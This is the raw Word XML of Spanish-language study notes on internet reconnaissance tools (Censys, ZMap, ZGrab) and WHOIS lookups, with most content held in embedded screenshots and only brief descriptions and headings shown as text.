    <w:p w14:paraId="1CE44F4F" w14:textId="71A75B32" w:rsidR="003226ED" w:rsidRPr="00D934B4" w:rsidRDefault="00D934B4" w:rsidP="003226ED">
      <w:r w:rsidRPr="001454BF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>CENSYS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">¿Qué es?: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D934B4">
        <w:t>Motor de búsqueda similar a Shodan, pero creado por investigadores de la Universidad de Michigan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8BA56E" w14:textId="66CEEBB4" w:rsidR="003226ED" w:rsidRDefault="00D934B4" w:rsidP="00525E63">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Diferencia con Shodan:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001454BF" w:rsidRPr="001454BF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B3544E3" wp14:editId="4414CD99">
            <wp:extent cx="4655820" cy="2053734"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="11204141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141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58937" cy="20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9910" w14:textId="77777777" w:rsidR="001454BF" w:rsidRPr="001454BF" w:rsidRDefault="001454BF" w:rsidP="001454BF">
      <w:r w:rsidRPr="00CB577A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ZMAP</w:t>
      </w:r>
      <w:r w:rsidRPr="001454BF">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001454BF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>¿Qué es?</w:t>
      </w:r>
      <w:r w:rsidRPr="001454BF">
        <w:t xml:space="preserve"> Escáner de red de Internet ultrarrápido creado por la Universidad de Michigan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E42490A" w14:textId="665397D6" w:rsidR="001454BF" w:rsidRDefault="00CB577A" w:rsidP="001454BF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB577A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5261F34A" wp14:editId="228E9768">
            <wp:extent cx="4648200" cy="1965586"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3765577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577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54510" cy="19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CB577A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FF4CF0D" wp14:editId="7C97F179">
            <wp:extent cx="4648200" cy="1547678"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15017922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922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53928" cy="15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25F8" w14:textId="77777777" w:rsidR="00BC5DC3" w:rsidRDefault="00BC5DC3" w:rsidP="001454BF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14FB79E2" w14:textId="77777777" w:rsidR="00BC5DC3" w:rsidRDefault="00BC5DC3" w:rsidP="001454BF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CF33218" w14:textId="77777777" w:rsidR="00BC5DC3" w:rsidRDefault="00BC5DC3" w:rsidP="001454BF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="250F3531" w14:textId="77777777" w:rsidR="00BC5DC3" w:rsidRPr="001454BF" w:rsidRDefault="00BC5DC3" w:rsidP="001454BF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02D5FDAE" w14:textId="77777777" w:rsidR="003D0A6D" w:rsidRPr="003D0A6D" w:rsidRDefault="00CB577A" w:rsidP="003D0A6D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB577A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ZMAP</w:t>
      </w:r>
      <w:r w:rsidR="003D0A6D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="003D0A6D" w:rsidRPr="003D0A6D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">¿Qué es? </w:t>
      </w:r>
      <w:r w:rsidR="003D0A6D" w:rsidRPr="00BC5DC3">
        <w:t xml:space="preserve">Herramienta de </w:t>
      </w:r>
      <w:r w:rsidR="003D0A6D" w:rsidRPr="00BC5DC3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>banner grabbing</w:t>
      </w:r>
      <w:r w:rsidR="003D0A6D" w:rsidRPr="00BC5DC3">
        <w:t xml:space="preserve"> que complementa a ZMap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7E7480" w14:textId="4C089BC6" w:rsidR="001454BF" w:rsidRDefault="00BC5DC3" w:rsidP="00525E63">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC5DC3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BD5D82A" wp14:editId="0E4B37EB">
            <wp:extent cx="4982283" cy="2148840"/>
            <wp:effectExtent l="0" t="0" r="8890" b="3810"/>
            <wp:docPr id="13902683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83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2815" cy="214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B9A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00B00B9A" w:rsidRPr="00B00B9A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="014CE149" wp14:editId="1AF18C22">
            <wp:extent cx="4945380" cy="1698830"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="9247195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95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51864" cy="17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881" w14:textId="77777777" w:rsidR="00B00B9A" w:rsidRPr="00B00B9A" w:rsidRDefault="00B00B9A" w:rsidP="00B00B9A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B00B9A">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>🔗</w:t>
      </w:r>
      <w:r w:rsidRPr="00B00B9A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> RELACIÓN ENTRE LAS TRES:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0851B8F4" w14:textId="395B8A3F" w:rsidR="00B00B9A" w:rsidRDefault="00B00B9A" w:rsidP="00525E63">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B00B9A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07D355F4" wp14:editId="7BEF15D5">
            <wp:extent cx="6636391" cy="4259580"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="1350594925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94925" name="Imagen 1" descr="Interfaz de usuario gráfica, Diagrama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36811" cy="42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D7F0" w14:textId="77777777" w:rsidR="00724302" w:rsidRPr="00724302" w:rsidRDefault="00724302" w:rsidP="00724302">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00724302">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>🎯</w:t>
      </w:r>
      <w:r w:rsidRPr="00724302">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> LO QUE VES EN TUS IMÁGENES:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDB7A01" w14:textId="52C2DF4C" w:rsidR="00724302" w:rsidRDefault="00724302" w:rsidP="00525E63">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00724302">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18FD3CEE" wp14:editId="6BE28FFD">
            <wp:extent cx="6781013" cy="2796540"/>
            <wp:effectExtent l="0" t="0" r="1270" b="3810"/>
            <wp:docPr id="512557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7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91949" cy="28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159D" w14:textId="070D69B1" w:rsidR="00724302" w:rsidRDefault="00724302" w:rsidP="00525E63">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00724302">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="289C61A0" wp14:editId="77EFF384">
            <wp:extent cx="4343400" cy="2443565"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8603644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644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45740" cy="24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35C" w14:textId="77777777" w:rsidR="00CC7000" w:rsidRPr="00CC7000" w:rsidRDefault="00CC7000" w:rsidP="00CC7000">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC7000">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>🔬</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC7000">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> USO EN INVESTIGACIÓN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5C886B" w14:textId="575AE52E" w:rsidR="00CC7000" w:rsidRDefault="00CC7000" w:rsidP="00525E63">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC7000">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5516EE33" wp14:editId="23C46E8E">
            <wp:extent cx="2628900" cy="2815936"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="17409173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17397" name="Imagen 1" descr="Tabla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2971" cy="28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4292" w14:textId="1ECF154A" w:rsidR="00350799" w:rsidRDefault="00350799" w:rsidP="00350799">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B86DBB">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">2.1.6.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00350799">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>📊</w:t>
      </w:r>
      <w:r w:rsidRPr="00350799">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> COMPARACIÓN CON OTRAS HERRAMIENTAS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0689BA" w14:textId="6C773AD9" w:rsidR="00350799" w:rsidRDefault="00B86DBB" w:rsidP="00350799">
      <w:r w:rsidRPr="00B86DBB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35198DBF" wp14:editId="0EB3789A">
            <wp:extent cx="5875020" cy="2175933"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="140039089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0898" name="Imagen 1" descr="Tabl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78974" cy="21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CDC8" w14:textId="4C21ABE3" w:rsidR="009803D3" w:rsidRDefault="009803D3" w:rsidP="009803D3">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B86DBB">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>2.1.6.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00B86DBB">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009803D3">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>🛠️ INSTALAR ZMAP Y ZGRAB (OPCIONAL):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F85F93" w14:textId="6E7A289F" w:rsidR="009803D3" w:rsidRPr="009803D3" w:rsidRDefault="009803D3" w:rsidP="009803D3">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009803D3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F75542B" wp14:editId="4CB91BFB">
            <wp:extent cx="6858000" cy="4332605"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8675156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156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609" w14:textId="77777777" w:rsidR="009803D3" w:rsidRDefault="009803D3" w:rsidP="00350799"/>
    <w:p w14:paraId="4F48F872" w14:textId="77777777" w:rsidR="00AA0577" w:rsidRDefault="00AA0577" w:rsidP="00350799"/>
    <w:p w14:paraId="0FA4C556" w14:textId="77777777" w:rsidR="00AA0577" w:rsidRDefault="00AA0577" w:rsidP="00350799"/>
    <w:p w14:paraId="2BE5E8B8" w14:textId="77777777" w:rsidR="00AA0577" w:rsidRDefault="00AA0577" w:rsidP="00350799"/>
    <w:p w14:paraId="434ABF06" w14:textId="77777777" w:rsidR="00AA0577" w:rsidRDefault="00AA0577" w:rsidP="00350799"/>
    <w:p w14:paraId="7FC94247" w14:textId="77777777" w:rsidR="00AA0577" w:rsidRDefault="00AA0577" w:rsidP="00350799"/>
    <w:p w14:paraId="1CC2DC82" w14:textId="77777777" w:rsidR="00AA0577" w:rsidRDefault="00AA0577" w:rsidP="00350799"/>
    <w:p w14:paraId="680ADB6C" w14:textId="4E3B9715" w:rsidR="00AA0577" w:rsidRDefault="00AA0577" w:rsidP="00AA0577">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00AA0577">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.1.7 Whois</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54700208" w14:textId="696DA377" w:rsidR="00AA0577" w:rsidRDefault="003860AC" w:rsidP="00350799">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003860AC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WHOIS</w:t>
      </w:r>
      <w:r w:rsidRPr="003860AC">
        <w:t xml:space="preserve"> = Base de datos pública que contiene información sobre quién </w:t>
      </w:r>
      <w:r w:rsidRPr="003860AC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>posee un dominio</w:t>
      </w:r>
      <w:r w:rsidRPr="003860AC">
        <w:t xml:space="preserve"> o </w:t>
      </w:r>
      <w:r w:rsidRPr="003860AC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>bloque de IPs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3346E2" w14:textId="7105B502" w:rsidR="003860AC" w:rsidRPr="003860AC" w:rsidRDefault="003860AC" w:rsidP="003860AC">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003860AC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">2.1.7.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="003860AC">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>📋</w:t>
      </w:r>
      <w:r w:rsidRPr="003860AC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> ¿QUÉ INFORMACIÓN REVELA?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8B8425" w14:textId="77777777" w:rsidR="00E64140" w:rsidRPr="00E64140" w:rsidRDefault="00E64140" w:rsidP="00E64140">
      <w:r w:rsidRPr="00E64140">
        <w:t>Cuando buscas un dominio o IP en WHOIS, obtienes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4BC722" w14:textId="77777777" w:rsidR="00E64140" w:rsidRPr="00E64140" w:rsidRDefault="00E64140" w:rsidP="00E64140">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E64140">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Para dominios (ejemplo.com):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64867684" w14:textId="7B26CB7A" w:rsidR="003860AC" w:rsidRDefault="00E64140" w:rsidP="003860AC">
      <w:r w:rsidRPr="00E64140">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A5900B5" wp14:editId="756FD6BF">
            <wp:extent cx="4815840" cy="1516990"/>
            <wp:effectExtent l="0" t="0" r="3810" b="7620"/>
            <wp:docPr id="112770157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157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5006" cy="15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FA88" w14:textId="77777777" w:rsidR="00E64140" w:rsidRPr="00E64140" w:rsidRDefault="00E64140" w:rsidP="00E64140">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E64140">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Para IPs (200.1.1.1):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170257AC" w14:textId="790797C0" w:rsidR="00E64140" w:rsidRDefault="00E64140" w:rsidP="003860AC">
      <w:r w:rsidRPr="00E64140">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3355A500" wp14:editId="09FCB224">
            <wp:extent cx="4937760" cy="994867"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="145542759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27593" name="Imagen 1" descr="Imagen que contiene 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1475" cy="9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BA3" w14:textId="09BD9191" w:rsidR="00E64140" w:rsidRDefault="00E64140" w:rsidP="00E64140">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003860AC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>2.1.7.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="003860AC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006B41C5" w:rsidRPr="006B41C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>EJEMPLO PRÁCTICO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730A9B9F" w14:textId="77777777" w:rsidR="006B41C5" w:rsidRPr="006B41C5" w:rsidRDefault="006B41C5" w:rsidP="006B41C5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B41C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Buscar dominio:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0F0176" w14:textId="188AD18A" w:rsidR="006B41C5" w:rsidRPr="006B41C5" w:rsidRDefault="006B41C5" w:rsidP="006B41C5">
      <w:r w:rsidRPr="006B41C5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20955761" wp14:editId="29661975">
            <wp:extent cx="4899660" cy="621985"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="1929458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5825" name="Imagen 1" descr="Interfaz de usuario gráfic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12176" cy="6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C2F" w14:textId="77777777" w:rsidR="006B41C5" w:rsidRPr="006B41C5" w:rsidRDefault="006B41C5" w:rsidP="006B41C5">
      <w:r w:rsidRPr="006B41C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Resultado:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425106DD" w14:textId="73F13C3B" w:rsidR="00E64140" w:rsidRDefault="006B41C5" w:rsidP="003860AC">
      <w:r w:rsidRPr="006B41C5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08A08C90" wp14:editId="1D24DE70">
            <wp:extent cx="5257800" cy="2470192"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="7586123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123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1978" cy="24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69A" w14:textId="77777777" w:rsidR="006B41C5" w:rsidRDefault="006B41C5" w:rsidP="003860AC"/>
    <w:p w14:paraId="4E51091D" w14:textId="77777777" w:rsidR="006B41C5" w:rsidRDefault="006B41C5" w:rsidP="003860AC"/>
    <w:p w14:paraId="2EB4D6F9" w14:textId="77777777" w:rsidR="006B41C5" w:rsidRPr="006B41C5" w:rsidRDefault="006B41C5" w:rsidP="006B41C5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B41C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Buscar IP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0439C480" w14:textId="7709CEF8" w:rsidR="006B41C5" w:rsidRDefault="006B41C5" w:rsidP="003860AC">
      <w:r w:rsidRPr="006B41C5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E55EA91" wp14:editId="3E0734B5">
            <wp:extent cx="3924300" cy="515609"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15125017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01708" name="Imagen 1" descr="Interfaz de usuario gráfica, Aplicación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75" cy="5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2427" w14:textId="77777777" w:rsidR="006B41C5" w:rsidRPr="006B41C5" w:rsidRDefault="006B41C5" w:rsidP="006B41C5">
